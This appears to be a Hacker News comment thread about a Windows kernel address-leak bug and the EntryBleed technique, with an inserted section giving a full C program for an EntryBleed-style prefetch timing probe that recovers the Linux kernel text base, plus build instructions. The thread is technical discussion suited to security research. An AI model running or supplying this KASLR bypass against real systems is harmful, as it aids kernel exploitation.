KASLR is broken anyway, at least on x86, even with KPTI (a Linux feature to mitigate Meltdown) enabled. See https://www.willsroot.io/2022/12/entrybleed.html, which still runs fine (with some modifications depending on the microarchitecture) on the latest AMD and Intel hardware that we've checked.
by KyleBerezin
1 subcomments
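The EntryBleed write-up linked in the comment above is a prefetch timing side channel: with KPTI, the syscall entry trampoline stays mapped in the user page tables, so after any syscall its TLB entry is present, and a `prefetch` of a candidate kernel-text address completes measurably faster when that address already has a cached translation. The probe below is an added illustration of that technique and is not code from the comment, the article, or the EntryBleed write-up. The kernel text window, the 2 MiB slide step, the round count, the use of `getgid` as the priming syscall, and above all the `entry_SYSCALL_64` offset are assumptions; the offset is build-specific and must be read from the target kernel's `System.map` for a real run. The pure helpers compile and work anywhere; the timing path only measures something on x86_64 Linux and only shows a signal on a KPTI target.

```c
/* Added example (not from the article or the linked write-up): an
 * EntryBleed-style prefetch timing probe for the Linux x86_64 kernel text base. */
#define _GNU_SOURCE
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <unistd.h>
#if defined(__linux__)
#include <sys/syscall.h>
#endif

/* Assumed scan parameters (not taken from the page): the x86_64 kernel text
 * KASLR window, 2 MiB slide granularity, and the build-specific offset of
 * entry_SYSCALL_64 from the text base. Read the offset from System.map. */
#define KTEXT_LOW               0xffffffff80000000ULL
#define KTEXT_HIGH              0xffffffffc0000000ULL
#define KTEXT_STEP              0x200000ULL
#define NCAND                   ((KTEXT_HIGH - KTEXT_LOW) / KTEXT_STEP)   /* 512 */
#define ENTRY_SYSCALL_64_OFFSET 0x400000ULL   /* assumed; varies per kernel build */
#define ROUNDS                  1000

/* Pure helpers, separated from the timing code so they can be checked
 * without x86 hardware. */
uint64_t candidate_addr(size_t i) { return KTEXT_LOW + (uint64_t)i * KTEXT_STEP; }

uint64_t kernel_base_from_leak(uint64_t leaked_trampoline_page) {
    return leaked_trampoline_page - ENTRY_SYSCALL_64_OFFSET;
}

/* Index of the smallest element; the first one wins on ties. */
size_t argmin_u64(const uint64_t *t, size_t n) {
    size_t best = 0;
    for (size_t i = 1; i < n; i++)
        if (t[i] < t[best]) best = i;
    return best;
}

/* Cycles taken by a prefetch of addr, fenced so the measurement is not
 * reordered around the prefetch. Returns 0 (measures nothing) off x86_64 Linux. */
static uint64_t prefetch_cycles(uint64_t addr) {
#if defined(__x86_64__) && defined(__linux__)
    uint32_t lo, hi, aux;
    uint64_t t0, t1;
    /* A cheap syscall re-arms the TLB entry for the entry trampoline page. */
    syscall(SYS_getgid);
    __asm__ __volatile__("mfence\n\tlfence\n\trdtscp\n\tlfence"
                         : "=a"(lo), "=d"(hi), "=c"(aux) : : "memory");
    t0 = ((uint64_t)hi << 32) | lo;
    __asm__ __volatile__("prefetcht0 (%0)\n\tprefetcht2 (%0)"
                         : : "r"(addr) : "memory");
    __asm__ __volatile__("rdtscp\n\tlfence"
                         : "=a"(lo), "=d"(hi), "=c"(aux) : : "memory");
    t1 = ((uint64_t)hi << 32) | lo;
    return t1 - t0;
#else
    (void)addr;
    return 0;
#endif
}

/* Minimum observed prefetch time per candidate, rounds interleaved across
 * candidates so clock drift hits them all equally. The fastest candidate is
 * the one whose translation was already in the TLB: the trampoline's page. */
static uint64_t probe_kernel_text(uint64_t *min_cycles) {
    for (size_t i = 0; i < NCAND; i++) min_cycles[i] = UINT64_MAX;
    for (int r = 0; r < ROUNDS; r++) {
        for (size_t i = 0; i < NCAND; i++) {
            uint64_t c = prefetch_cycles(candidate_addr(i));
            if (c < min_cycles[i]) min_cycles[i] = c;
        }
    }
    return candidate_addr(argmin_u64(min_cycles, NCAND));
}

int main(void) {
    static uint64_t min_cycles[NCAND];
    uint64_t leak = probe_kernel_text(min_cycles);
    printf("fastest candidate (entry trampoline page): 0x%llx\n",
           (unsigned long long)leak);
    printf("derived kernel text base (assumed offset):  0x%llx\n",
           (unsigned long long)kernel_base_from_leak(leak));
    return 0;
}
```

Build with `gcc -O2 entrybleed_probe.c` and run unprivileged; on a non-KPTI or non-x86 host every candidate times the same and the reported address is meaningless. Taking the per-candidate minimum rather than the mean is a design choice here: it discards interrupts and scheduling noise, which only ever make a sample slower.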
I find myself thinking "wow, what an obvious bug. How did Microsoft not catch that?" but then I think back to some of my own extremely obvious bugs. Thankfully my code is much lower impact.
by mkolassa
1 subcomments
It’s interesting that the KB that patches this on Windows 11 (KB5063878) is the same one that was tied up in all the Phison SSD drama.
by Jare
4 subcomments
I went to check when the bug had been patched, and was left wanting. I however lack the expertise to really appreciate how much danger exists in practice, or for whom. I just know I do have Win11 24H2 and "This leak primitive is particularly useful for Windows versions 24H2 or later"
by dcrazy
2 subcomments
I can’t find any mention online of the `SystemTokenInformation` enum member outside of this article, even in this otherwise very comprehensive collection of documented and undocumented values: https://www.geoffchappell.com/studies/windows/km/ntoskrnl/ap...
Seems like SystemTokenInformation might be a very new addition, possibly even Windows 11 only?
by lysace
1 subcomments
Random: Perhaps that full source code leak in 2004 actually helped harden the kernel, long term?